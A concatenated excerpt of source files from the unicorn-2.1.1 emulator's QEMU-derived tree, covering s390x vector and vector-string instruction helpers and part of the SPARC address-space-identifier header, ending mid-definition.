HELPER(gvec_verim##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ const uint8_t count = simd_data(desc); \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v1, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t mask = s390_vec_read_element##BITS(v3, i); \ const uint##BITS##_t d = (a & 
~mask) | (rol##BITS(b, count) & mask); \ \ s390_vec_write_element##BITS(v1, i, d); \ } \ } DEF_VERIM(8) DEF_VERIM(16) void HELPER(gvec_vsl)(void *v1, const void *v2, uint64_t count, uint32_t desc) { s390_vec_shl(v1, v2, count); } void HELPER(gvec_vsra)(void *v1, const void *v2, uint64_t count, uint32_t desc) { s390_vec_sar(v1, v2, count); } void HELPER(gvec_vsrl)(void *v1, const void *v2, uint64_t count, uint32_t desc) { s390_vec_shr(v1, v2, count); } #define DEF_VSCBI(BITS) \ void HELPER(gvec_vscbi##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, a >= b); \ } \ } DEF_VSCBI(8) DEF_VSCBI(16) void HELPER(gvec_vtm)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { S390Vector tmp; s390_vec_and(&tmp, v1, v2); if (s390_vec_is_zero(&tmp)) { /* Selected bits all zeros; or all mask bits zero */ env->cc_op = 0; } else if (s390_vec_equal(&tmp, v2)) { /* Selected bits all ones */ env->cc_op = 3; } else { /* Selected bits a mix of zeros and ones */ env->cc_op = 1; } } unicorn-2.1.1/qemu/target/s390x/vec_string_helper.c /* * QEMU TCG support -- s390x vector string instruction support * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "cpu.h" #include "internal.h" #include "vec.h" #include "tcg/tcg.h" #include "tcg/tcg-gvec-desc.h" #include "exec/helper-proto.h" /* * Returns a bit set in the MSB of each element that is zero, * as defined by the mask. */ static inline uint64_t zero_search(uint64_t a, uint64_t mask) { return ~(((a & mask) + mask) | a | mask); } /* * Returns a bit set in the MSB of each element that is not zero, * as defined by the mask. */ static inline uint64_t nonzero_search(uint64_t a, uint64_t mask) { return (((a & mask) + mask) | a) & ~mask; } /* * Returns the byte offset for the first match, or 16 for no match. */ static inline int match_index(uint64_t c0, uint64_t c1) { return (c0 ? clz64(c0) : clz64(c1) + 64) >> 3; } /* * Returns the number of bits composing one element. */ static uint8_t get_element_bits(uint8_t es) { return (1 << es) * BITS_PER_BYTE; } /* * Returns the bitmask for a single element. */ static uint64_t get_single_element_mask(uint8_t es) { return -1ull >> (64 - get_element_bits(es)); } /* * Returns the bitmask for a single element (excluding the MSB).
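 * For MO_8 (es = 0) that is 0x7f, for MO_16 it is 0x7fff, and so on.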
*/ static uint64_t get_single_element_lsbs_mask(uint8_t es) { return -1ull >> (65 - get_element_bits(es)); } /* * Returns the bitmasks for multiple elements (excluding the MSBs). */ static uint64_t get_element_lsbs_mask(uint8_t es) { return dup_const(es, get_single_element_lsbs_mask(es)); } static int vfae(void *v1, const void *v2, const void *v3, bool in, bool rt, bool zs, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); const int bits = get_element_bits(es); uint64_t a0, a1, b0, b1, e0, e1, t0, t1, z0, z1; uint64_t first_zero = 16; uint64_t first_equal; int i; a0 = s390_vec_read_element64(v2, 0); a1 = s390_vec_read_element64(v2, 1); b0 = s390_vec_read_element64(v3, 0); b1 = s390_vec_read_element64(v3, 1); e0 = 0; e1 = 0; /* compare against equality with every other element */ for (i = 0; i < 64; i += bits) { t0 = rol64(b0, i); t1 = rol64(b1, i); e0 |= zero_search(a0 ^ t0, mask); e0 |= zero_search(a0 ^ t1, mask); e1 |= zero_search(a1 ^ t0, mask); e1 |= zero_search(a1 ^ t1, mask); } /* invert the result if requested - invert only the MSBs */ if (in) { e0 = ~e0 & ~mask; e1 = ~e1 & ~mask; } first_equal = match_index(e0, e1); if (zs) { z0 = zero_search(a0, mask); z1 = zero_search(a1, mask); first_zero = match_index(z0, z1); } if (rt) { e0 = (e0 >> (bits - 1)) * get_single_element_mask(es); e1 = (e1 >> (bits - 1)) * get_single_element_mask(es); s390_vec_write_element64(v1, 0, e0); s390_vec_write_element64(v1, 1, e1); } else { s390_vec_write_element64(v1, 0, MIN(first_equal, first_zero)); s390_vec_write_element64(v1, 1, 0); } if (first_zero == 16 && first_equal == 16) { return 3; /* no match */ } else if (first_zero == 16) { return 1; /* matching elements, no match for zero */ } else if (first_equal < first_zero) { return 2; /* matching elements before match for zero */ } return 0; /* match for zero */ } #define DEF_VFAE_HELPER(BITS) \ void HELPER(gvec_vfae##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool rt = extract32(simd_data(desc), 2, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vfae(v1, v2, v3, in, rt, zs, MO_##BITS); \ } DEF_VFAE_HELPER(8) DEF_VFAE_HELPER(16) DEF_VFAE_HELPER(32) #define DEF_VFAE_CC_HELPER(BITS) \ void HELPER(gvec_vfae_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool rt = extract32(simd_data(desc), 2, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vfae(v1, v2, v3, in, rt, zs, MO_##BITS); \ } DEF_VFAE_CC_HELPER(8) DEF_VFAE_CC_HELPER(16) DEF_VFAE_CC_HELPER(32) static int vfee(void *v1, const void *v2, const void *v3, bool zs, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); uint64_t a0, a1, b0, b1, e0, e1, z0, z1; uint64_t first_zero = 16; uint64_t first_equal; a0 = s390_vec_read_element64(v2, 0); a1 = s390_vec_read_element64(v2, 1); b0 = s390_vec_read_element64(v3, 0); b1 = s390_vec_read_element64(v3, 1); e0 = zero_search(a0 ^ b0, mask); e1 = zero_search(a1 ^ b1, mask); first_equal = match_index(e0, e1); if (zs) { z0 = zero_search(a0, mask); z1 = zero_search(a1, mask); first_zero = match_index(z0, z1); } s390_vec_write_element64(v1, 0, MIN(first_equal, first_zero)); s390_vec_write_element64(v1, 1, 0); if (first_zero == 16 && first_equal == 16) { return 3; /* no match */ } else if (first_zero == 16) { return 1; /* matching elements, no match for zero */ } else if (first_equal < first_zero) { return 2; /* matching 
elements before match for zero */ } return 0; /* match for zero */ } #define DEF_VFEE_HELPER(BITS) \ void HELPER(gvec_vfee##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vfee(v1, v2, v3, zs, MO_##BITS); \ } DEF_VFEE_HELPER(8) DEF_VFEE_HELPER(16) DEF_VFEE_HELPER(32) #define DEF_VFEE_CC_HELPER(BITS) \ void HELPER(gvec_vfee_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vfee(v1, v2, v3, zs, MO_##BITS); \ } DEF_VFEE_CC_HELPER(8) DEF_VFEE_CC_HELPER(16) DEF_VFEE_CC_HELPER(32) static int vfene(void *v1, const void *v2, const void *v3, bool zs, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); uint64_t a0, a1, b0, b1, e0, e1, z0, z1; uint64_t first_zero = 16; uint64_t first_inequal; bool smaller = false; a0 = s390_vec_read_element64(v2, 0); a1 = s390_vec_read_element64(v2, 1); b0 = s390_vec_read_element64(v3, 0); b1 = s390_vec_read_element64(v3, 1); e0 = nonzero_search(a0 ^ b0, mask); e1 = nonzero_search(a1 ^ b1, mask); first_inequal = match_index(e0, e1); /* identify the smaller element */ if (first_inequal < 16) { uint8_t enr = first_inequal / (1 << es); uint32_t a = s390_vec_read_element(v2, enr, es); uint32_t b = s390_vec_read_element(v3, enr, es); smaller = a < b; } if (zs) { z0 = zero_search(a0, mask); z1 = zero_search(a1, mask); first_zero = match_index(z0, z1); } s390_vec_write_element64(v1, 0, MIN(first_inequal, first_zero)); s390_vec_write_element64(v1, 1, 0); if (first_zero == 16 && first_inequal == 16) { return 3; } else if (first_zero < first_inequal) { return 0; } return smaller ? 1 : 2; } #define DEF_VFENE_HELPER(BITS) \ void HELPER(gvec_vfene##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vfene(v1, v2, v3, zs, MO_##BITS); \ } DEF_VFENE_HELPER(8) DEF_VFENE_HELPER(16) DEF_VFENE_HELPER(32) #define DEF_VFENE_CC_HELPER(BITS) \ void HELPER(gvec_vfene_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vfene(v1, v2, v3, zs, MO_##BITS); \ } DEF_VFENE_CC_HELPER(8) DEF_VFENE_CC_HELPER(16) DEF_VFENE_CC_HELPER(32) static int vistr(void *v1, const void *v2, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); uint64_t a0 = s390_vec_read_element64(v2, 0); uint64_t a1 = s390_vec_read_element64(v2, 1); uint64_t z; int cc = 3; z = zero_search(a0, mask); if (z) { a0 &= ~(-1ull >> clz64(z)); a1 = 0; cc = 0; } else { z = zero_search(a1, mask); if (z) { a1 &= ~(-1ull >> clz64(z)); cc = 0; } } s390_vec_write_element64(v1, 0, a0); s390_vec_write_element64(v1, 1, a1); return cc; } #define DEF_VISTR_HELPER(BITS) \ void HELPER(gvec_vistr##BITS)(void *v1, const void *v2, uint32_t desc) \ { \ vistr(v1, v2, MO_##BITS); \ } DEF_VISTR_HELPER(8) DEF_VISTR_HELPER(16) DEF_VISTR_HELPER(32) #define DEF_VISTR_CC_HELPER(BITS) \ void HELPER(gvec_vistr_cc##BITS)(void *v1, const void *v2, CPUS390XState *env, \ uint32_t desc) \ { \ env->cc_op = vistr(v1, v2, MO_##BITS); \ } DEF_VISTR_CC_HELPER(8) DEF_VISTR_CC_HELPER(16) DEF_VISTR_CC_HELPER(32) static bool element_compare(uint32_t data, uint32_t l, uint8_t c) { const bool equal = extract32(c, 7, 1); const bool lower = extract32(c, 6, 1); const bool higher = extract32(c, 5, 1); if (data < l) { return lower; } else if (data > l) { return higher; } return equal; } static int 
vstrc(void *v1, const void *v2, const void *v3, const void *v4, bool in, bool rt, bool zs, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); uint64_t a0 = s390_vec_read_element64(v2, 0); uint64_t a1 = s390_vec_read_element64(v2, 1); int first_zero = 16, first_match = 16; S390Vector rt_result = { 0 }; uint64_t z0, z1; int i, j; if (zs) { z0 = zero_search(a0, mask); z1 = zero_search(a1, mask); first_zero = match_index(z0, z1); } for (i = 0; i < 16 / (1 << es); i++) { const uint32_t data = s390_vec_read_element(v2, i, es); const int cur_byte = i * (1 << es); bool any_match = false; /* if we don't need a bit vector, we can stop early */ if (cur_byte == first_zero && !rt) { break; } for (j = 0; j < 16 / (1 << es); j += 2) { const uint32_t l1 = s390_vec_read_element(v3, j, es); const uint32_t l2 = s390_vec_read_element(v3, j + 1, es); /* we are only interested in the highest byte of each element */ const uint8_t c1 = s390_vec_read_element8(v4, j * (1 << es)); const uint8_t c2 = s390_vec_read_element8(v4, (j + 1) * (1 << es)); if (element_compare(data, l1, c1) && element_compare(data, l2, c2)) { any_match = true; break; } } /* invert the result if requested */ any_match = in ^ any_match; if (any_match) { /* indicate bit vector if requested */ if (rt) { const uint64_t val = -1ull; first_match = MIN(cur_byte, first_match); s390_vec_write_element(&rt_result, i, es, val); } else { /* stop on the first match */ first_match = cur_byte; break; } } } if (rt) { *(S390Vector *)v1 = rt_result; } else { s390_vec_write_element64(v1, 0, MIN(first_match, first_zero)); s390_vec_write_element64(v1, 1, 0); } if (first_zero == 16 && first_match == 16) { return 3; /* no match */ } else if (first_zero == 16) { return 1; /* matching elements, no match for zero */ } else if (first_match < first_zero) { return 2; /* matching elements before match for zero */ } return 0; /* match for zero */ } #define DEF_VSTRC_HELPER(BITS) \ void HELPER(gvec_vstrc##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vstrc(v1, v2, v3, v4, in, 0, zs, MO_##BITS); \ } DEF_VSTRC_HELPER(8) DEF_VSTRC_HELPER(16) DEF_VSTRC_HELPER(32) #define DEF_VSTRC_RT_HELPER(BITS) \ void HELPER(gvec_vstrc_rt##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vstrc(v1, v2, v3, v4, in, 1, zs, MO_##BITS); \ } DEF_VSTRC_RT_HELPER(8) DEF_VSTRC_RT_HELPER(16) DEF_VSTRC_RT_HELPER(32) #define DEF_VSTRC_CC_HELPER(BITS) \ void HELPER(gvec_vstrc_cc##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, CPUS390XState *env, \ uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vstrc(v1, v2, v3, v4, in, 0, zs, MO_##BITS); \ } DEF_VSTRC_CC_HELPER(8) DEF_VSTRC_CC_HELPER(16) DEF_VSTRC_CC_HELPER(32) #define DEF_VSTRC_CC_RT_HELPER(BITS) \ void HELPER(gvec_vstrc_cc_rt##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, CPUS390XState *env, \ uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vstrc(v1, v2, v3, v4, in, 1, zs, MO_##BITS); \ } DEF_VSTRC_CC_RT_HELPER(8) DEF_VSTRC_CC_RT_HELPER(16) DEF_VSTRC_CC_RT_HELPER(32) 
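/*
 * Worked example (illustrative values only) of the zero_search() and
 * match_index() machinery used by the helpers above, for ES == MO_8,
 * i.e. mask == get_element_lsbs_mask(MO_8) == 0x7f7f7f7f7f7f7f7full:
 *
 *   a = 0x0041005800000042  (bytes 00 41 00 58 00 00 00 42)
 *   zero_search(a, mask) == ~(((a & mask) + mask) | a | mask)
 *                        == 0x8000800080808000  (MSB set per zero byte)
 *
 * A nonzero byte either has its MSB set already (kept by "| a") or
 * produces a carry into its MSB via "+ mask"; inverting therefore leaves
 * the MSB set only for zero bytes. With c0 as above and c1 == 0,
 * match_index(c0, c1) == clz64(c0) >> 3 == 0: element 0 is the
 * most-significant element of the vector, hence the count-leading-zeros.
 */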
unicorn-2.1.1/qemu/target/sparc/ unicorn-2.1.1/qemu/target/sparc/asi.h #ifndef SPARC_ASI_H #define SPARC_ASI_H /* asi.h: Address Space Identifier values for the sparc. * * Copyright (C) 1995,1996 David S. Miller (davem@caip.rutgers.edu) * * Pioneer work for sun4m: Paul Hatchman (paul@sfe.com.au) * Joint edition for sun4c+sun4m: Pete A. Zaitcev <zaitcev@ipmce.su> */ /* The first batch are for the sun4c. */ #define ASI_NULL1 0x00 #define ASI_NULL2 0x01 /* sun4c and sun4 control registers and mmu/vac ops */ #define ASI_CONTROL 0x02 #define ASI_SEGMAP 0x03 #define ASI_PTE 0x04 #define ASI_HWFLUSHSEG 0x05 #define ASI_HWFLUSHPAGE 0x06 #define ASI_REGMAP 0x06 #define ASI_HWFLUSHCONTEXT 0x07 #define ASI_USERTXT 0x08 #define ASI_KERNELTXT 0x09 #define ASI_USERDATA 0x0a #define ASI_KERNELDATA 0x0b /* VAC Cache flushing on sun4c and sun4 */ #define ASI_FLUSHSEG 0x0c #define ASI_FLUSHPG 0x0d #define ASI_FLUSHCTX 0x0e /* SPARCstation-5: only 6 bits are decoded. */ /* wo = Write Only, rw = Read Write; */ /* ss = Single Size, as = All Sizes; */ #define ASI_M_RES00 0x00 /* Don't touch... */ #define ASI_M_UNA01 0x01 /* Same here... */ #define ASI_M_MXCC 0x02 /* Access to TI VIKING MXCC registers */ #define ASI_M_FLUSH_PROBE 0x03 /* Reference MMU Flush/Probe; rw, ss */ #define ASI_M_MMUREGS 0x04 /* MMU Registers; rw, ss */ #define ASI_M_TLBDIAG 0x05 /* MMU TLB only Diagnostics */ #define ASI_M_DIAGS 0x06 /* Reference MMU Diagnostics */ #define ASI_M_IODIAG 0x07 /* MMU I/O TLB only Diagnostics */ #define ASI_M_USERTXT 0x08 /* Same as ASI_USERTXT; rw, as */ #define ASI_M_KERNELTXT 0x09 /* Same as ASI_KERNELTXT; rw, as */ #define ASI_M_USERDATA 0x0A /* Same as ASI_USERDATA; rw, as */ #define ASI_M_KERNELDATA 0x0B /* Same as ASI_KERNELDATA; rw, as */ #define ASI_M_TXTC_TAG 0x0C /* Instruction Cache Tag; rw, ss */ #define ASI_M_TXTC_DATA 0x0D /* Instruction Cache Data; rw, ss */ #define ASI_M_DATAC_TAG 0x0E /* Data Cache Tag; rw, ss */ #define ASI_M_DATAC_DATA 0x0F /* Data Cache Data; rw, ss */ /* The following cache flushing ASIs work only with the 'sta' * instruction. Results are unpredictable for 'swap' and 'ldstuba', * so don't do it. */ /* These ASI flushes affect external caches too.
*/ #define ASI_M_FLUSH_PAGE 0x10 /* Flush I&D Cache Line (page); wo, ss */ #define ASI_M_FLUSH_SEG 0x11 /* Flush I&D Cache Line (seg); wo, ss */ #define ASI_M_FLUSH_REGION 0x12 /* Flush I&D Cache Line (region); wo, ss */ #define ASI_M_FLUSH_CTX 0x13 /* Flush I&D Cache Line (context); wo, ss */ #define ASI_M_FLUSH_USER 0x14 /* Flush I&D Cache Line (user); wo, ss */ /* Block-copy operations are available only on certain V8 cpus. */ #define ASI_M_BCOPY 0x17 /* Block copy */ /* These affect only the ICACHE and are Ross HyperSparc and TurboSparc specific. */ #define ASI_M_IFLUSH_PAGE 0x18 /* Flush I Cache Line (page); wo, ss */ #define ASI_M_IFLUSH_SEG 0x19 /* Flush I Cache Line (seg); wo, ss */ #define ASI_M_IFLUSH_REGION 0x1A /* Flush I Cache Line (region); wo, ss */ #define ASI_M_IFLUSH_CTX 0x1B /* Flush I Cache Line (context); wo, ss */ #define ASI_M_IFLUSH_USER 0x1C /* Flush I Cache Line (user); wo, ss */ /* Block-fill operations are available on certain V8 cpus */ #define ASI_M_BFILL 0x1F /* This allows direct access to main memory, actually 0x20 to 0x2f are * the available ASI's for physical ram pass-through, but I don't have * any idea what the other ones do.... */ #define ASI_M_BYPASS 0x20 /* Reference MMU bypass; rw, as */ #define ASI_M_FBMEM 0x29 /* Graphics card frame buffer access */ #define ASI_M_VMEUS 0x2A /* VME user 16-bit access */ #define ASI_M_VMEPS 0x2B /* VME priv 16-bit access */ #define ASI_M_VMEUT 0x2C /* VME user 32-bit access */ #define ASI_M_VMEPT 0x2D /* VME priv 32-bit access */ #define ASI_M_SBUS 0x2E /* Direct SBus access */ #define ASI_M_CTL 0x2F /* Control Space (ECC and MXCC are here) */ /* This is ROSS HyperSparc only. */ #define ASI_M_FLUSH_IWHOLE 0x31 /* Flush entire ICACHE; wo, ss */ /* Tsunami/Viking/TurboSparc i/d cache flash clear. */ #define ASI_M_IC_FLCLEAR 0x36 #define ASI_M_DC_FLCLEAR 0x37 #define ASI_M_DCDR 0x39 /* Data Cache Diagnostics Register rw, ss */ #define ASI_M_VIKING_TMP1 0x40 /* Emulation temporary 1 on Viking */ /* only available on SuperSparc I */ /* #define ASI_M_VIKING_TMP2 0x41 */ /* Emulation temporary 2 on Viking */ #define ASI_M_ACTION 0x4c /* Breakpoint Action Register (GNU/Viking) */ /* LEON ASI */ #define ASI_LEON_NOCACHE 0x01 #define ASI_LEON_DCACHE_MISS 0x01 #define ASI_LEON_CACHEREGS 0x02 #define ASI_LEON_IFLUSH 0x10 #define ASI_LEON_DFLUSH 0x11 #define ASI_LEON_MMUFLUSH 0x18 #define ASI_LEON_MMUREGS 0x19 #define ASI_LEON_BYPASS 0x1c #define ASI_LEON_FLUSH_PAGE 0x10 /* V9 Architecture mandatory ASIs. */ #define ASI_N 0x04 /* Nucleus */ #define ASI_NL 0x0c /* Nucleus, little endian */ #define ASI_AIUP 0x10 /* Primary, user */ #define ASI_AIUS 0x11 /* Secondary, user */ #define ASI_AIUPL 0x18 /* Primary, user, little endian */ #define ASI_AIUSL 0x19 /* Secondary, user, little endian */ #define ASI_P 0x80 /* Primary, implicit */ #define ASI_S 0x81 /* Secondary, implicit */ #define ASI_PNF 0x82 /* Primary, no fault */ #define ASI_SNF 0x83 /* Secondary, no fault */ #define ASI_PL 0x88 /* Primary, implicit, l-endian */ #define ASI_SL 0x89 /* Secondary, implicit, l-endian */ #define ASI_PNFL 0x8a /* Primary, no fault, l-endian */ #define ASI_SNFL 0x8b /* Secondary, no fault, l-endian */ /* SpitFire and later extended ASIs. The "(III)" marker designates * UltraSparc-III and later specific ASIs. The "(CMT)" marker designates * Chip Multi Threading specific ASIs. "(NG)" designates Niagara specific * ASIs, "(4V)" designates SUN4V specific ASIs. "(NG4)" designates SPARC-T4 * and later ASIs.
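 * All of these are used with the alternate-space forms of the memory
 * instructions (lda/sta, ldxa/stxa, casxa and friends), e.g.
 * "ldxa [%g1] ASI_DMMU, %g2" to read a D-MMU register.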
*/ #define ASI_REAL 0x14 /* Real address, cachable */ #define ASI_PHYS_USE_EC 0x14 /* PADDR, E-cachable */ #define ASI_REAL_IO 0x15 /* Real address, non-cachable */ #define ASI_PHYS_BYPASS_EC_E 0x15 /* PADDR, E-bit */ #define ASI_BLK_AIUP_4V 0x16 /* (4V) Prim, user, block ld/st */ #define ASI_BLK_AIUS_4V 0x17 /* (4V) Sec, user, block ld/st */ #define ASI_REAL_L 0x1c /* Real address, cachable, LE */ #define ASI_PHYS_USE_EC_L 0x1c /* PADDR, E-cachable, little endian*/ #define ASI_REAL_IO_L 0x1d /* Real address, non-cachable, LE */ #define ASI_PHYS_BYPASS_EC_E_L 0x1d /* PADDR, E-bit, little endian */ #define ASI_BLK_AIUP_L_4V 0x1e /* (4V) Prim, user, block, l-endian*/ #define ASI_BLK_AIUS_L_4V 0x1f /* (4V) Sec, user, block, l-endian */ #define ASI_SCRATCHPAD 0x20 /* (4V) Scratch Pad Registers */ #define ASI_MMU 0x21 /* (4V) MMU Context Registers */ #define ASI_TWINX_AIUP 0x22 /* twin load, primary user */ #define ASI_TWINX_AIUS 0x23 /* twin load, secondary user */ #define ASI_BLK_INIT_QUAD_LDD_AIUS 0x23 /* (NG) init-store, twin load, * secondary, user */ #define ASI_NUCLEUS_QUAD_LDD 0x24 /* Cachable, qword load */ #define ASI_QUEUE 0x25 /* (4V) Interrupt Queue Registers */ #define ASI_TWINX_REAL 0x26 /* twin load, real, cachable */ #define ASI_QUAD_LDD_PHYS_4V 0x26 /* (4V) Physical, qword load */ #define ASI_TWINX_N 0x27 /* twin load, nucleus */ #define ASI_TWINX_AIUP_L 0x2a /* twin load, primary user, LE */ #define ASI_TWINX_AIUS_L 0x2b /* twin load, secondary user, LE */ #define ASI_NUCLEUS_QUAD_LDD_L 0x2c /* Cachable, qword load, l-endian */ #define ASI_TWINX_REAL_L 0x2e /* twin load, real, cachable, LE */ #define ASI_QUAD_LDD_PHYS_L_4V 0x2e /* (4V) Phys, qword load, l-endian */ #define ASI_TWINX_NL 0x2f /* twin load, nucleus, LE */ #define ASI_PCACHE_DATA_STATUS 0x30 /* (III) PCache data stat RAM diag */ #define ASI_PCACHE_DATA 0x31 /* (III) PCache data RAM diag */ #define ASI_PCACHE_TAG 0x32 /* (III) PCache tag RAM diag */ #define ASI_PCACHE_SNOOP_TAG 0x33 /* (III) PCache snoop tag RAM diag */ #define ASI_QUAD_LDD_PHYS 0x34 /* (III+) PADDR, qword load */ #define ASI_WCACHE_VALID_BITS 0x38 /* (III) WCache Valid Bits diag */ #define ASI_WCACHE_DATA 0x39 /* (III) WCache data RAM diag */ #define ASI_WCACHE_TAG 0x3a /* (III) WCache tag RAM diag */ #define ASI_WCACHE_SNOOP_TAG 0x3b /* (III) WCache snoop tag RAM diag */ #define ASI_QUAD_LDD_PHYS_L 0x3c /* (III+) PADDR, qw-load, l-endian */ #define ASI_SRAM_FAST_INIT 0x40 /* (III+) Fast SRAM init */ #define ASI_CORE_AVAILABLE 0x41 /* (CMT) LP Available */ #define ASI_CORE_ENABLE_STAT 0x41 /* (CMT) LP Enable Status */ #define ASI_CORE_ENABLE 0x41 /* (CMT) LP Enable RW */ #define ASI_XIR_STEERING 0x41 /* (CMT) XIR Steering RW */ #define ASI_CORE_RUNNING_RW 0x41 /* (CMT) LP Running RW */ #define ASI_CORE_RUNNING_W1S 0x41 /* (CMT) LP Running Write-One Set */ #define ASI_CORE_RUNNING_W1C 0x41 /* (CMT) LP Running Write-One Clr */ #define ASI_CORE_RUNNING_STAT 0x41 /* (CMT) LP Running Status */ #define ASI_CMT_ERROR_STEERING 0x41 /* (CMT) Error Steering RW */ #define ASI_DCACHE_INVALIDATE 0x42 /* (III) DCache Invalidate diag */ #define ASI_DCACHE_UTAG 0x43 /* (III) DCache uTag diag */ #define ASI_DCACHE_SNOOP_TAG 0x44 /* (III) DCache snoop tag RAM diag */ #define ASI_LSU_CONTROL 0x45 /* Load-store control unit */ #define ASI_DCU_CONTROL_REG 0x45 /* (III) DCache Unit Control reg */ #define ASI_DCACHE_DATA 0x46 /* DCache data-ram diag access */ #define ASI_DCACHE_TAG 0x47 /* Dcache tag/valid ram diag access*/ #define ASI_INTR_DISPATCH_STAT 0x48 /* IRQ 
vector dispatch status */ #define ASI_INTR_RECEIVE 0x49 /* IRQ vector receive status */ #define ASI_UPA_CONFIG 0x4a /* UPA config space */ #define ASI_JBUS_CONFIG 0x4a /* (IIIi) JBUS Config Register */ #define ASI_SAFARI_CONFIG 0x4a /* (III) Safari Config Register */ #define ASI_SAFARI_ADDRESS 0x4a /* (III) Safari Address Register */ #define ASI_ESTATE_ERROR_EN 0x4b /* E-cache error enable space */ #define ASI_AFSR 0x4c /* Async fault status register */ #define ASI_AFAR 0x4d /* Async fault address register */ #define ASI_EC_TAG_DATA 0x4e /* E-cache tag/valid ram diag acc */ #define ASI_HYP_SCRATCHPAD 0x4f /* (4V) Hypervisor scratchpad */ #define ASI_IMMU 0x50 /* Insn-MMU main register space */ #define ASI_IMMU_TSB_8KB_PTR 0x51 /* Insn-MMU 8KB TSB pointer reg */ #define ASI_IMMU_TSB_64KB_PTR 0x52 /* Insn-MMU 64KB TSB pointer reg */ #define ASI_ITLB_DATA_IN 0x54 /* Insn-MMU TLB data in reg */ #define ASI_ITLB_DATA_ACCESS 0x55 /* Insn-MMU TLB data access reg */ #define ASI_ITLB_TAG_READ 0x56 /* Insn-MMU TLB tag read reg */ #define ASI_IMMU_DEMAP 0x57 /* Insn-MMU TLB demap */ #define ASI_DMMU 0x58 /* Data-MMU main register space */ #define ASI_DMMU_TSB_8KB_PTR 0x59 /* Data-MMU 8KB TSB pointer reg */ #define ASI_DMMU_TSB_64KB_PTR 0x5a /* Data-MMU 64KB TSB pointer reg */ #define ASI_DMMU_TSB_DIRECT_PTR 0x5b /* Data-MMU TSB direct pointer reg */ #define ASI_DTLB_DATA_IN 0x5c /* Data-MMU TLB data in reg */ #define ASI_DTLB_DATA_ACCESS 0x5d /* Data-MMU TLB data access reg */ #define ASI_DTLB_TAG_READ 0x5e /* Data-MMU TLB tag read reg */ #define ASI_DMMU_DEMAP 0x5f /* Data-MMU TLB demap */ #define ASI_IIU_INST_TRAP 0x60 /* (III) Instruction Breakpoint */ #define ASI_INTR_ID 0x63 /* (CMT) Interrupt ID register */ #define ASI_CORE_ID 0x63 /* (CMT) LP ID register */ #define ASI_CESR_ID 0x63 /* (CMT) CESR ID register */ #define ASI_IC_INSTR 0x66 /* Insn cache instruction ram diag */ #define ASI_IC_TAG 0x67 /* Insn cache tag/valid ram diag */ #define ASI_IC_STAG 0x68 /* (III) Insn cache snoop tag ram */ #define ASI_IC_PRE_DECODE 0x6e /* Insn cache pre-decode ram diag */ #define ASI_IC_NEXT_FIELD 0x6f /* Insn cache next-field ram diag */ #define ASI_BRPRED_ARRAY 0x6f /* (III) Branch Prediction RAM diag*/ #define ASI_BLK_AIUP 0x70 /* Primary, user, block load/store */ #define ASI_BLK_AIUS 0x71 /* Secondary, user, block ld/st */ #define ASI_MCU_CTRL_REG 0x72 /* (III) Memory controller regs */ #define ASI_EC_DATA 0x74 /* (III) E-cache data staging reg */ #define ASI_EC_CTRL 0x75 /* (III) E-cache control reg */ #define ASI_EC_W 0x76 /* E-cache diag write access */ #define ASI_UDB_ERROR_W 0x77 /* External UDB error regs W */ #define ASI_UDB_CONTROL_W 0x77 /* External UDB control regs W */ #define ASI_INTR_W 0x77 /* IRQ vector dispatch write */ #define ASI_INTR_DATAN_W 0x77 /* (III) Out irq vector data reg N */ #define ASI_INTR_DISPATCH_W 0x77 /* (III) Interrupt vector dispatch */ #define ASI_BLK_AIUPL 0x78 /* Primary, user, little, blk ld/st*/ #define ASI_BLK_AIUSL 0x79 /* Secondary, user, little, blk ld/st*/ #define ASI_EC_R 0x7e /* E-cache diag read access */ #define ASI_UDBH_ERROR_R 0x7f /* External UDB error regs rd hi */ #define 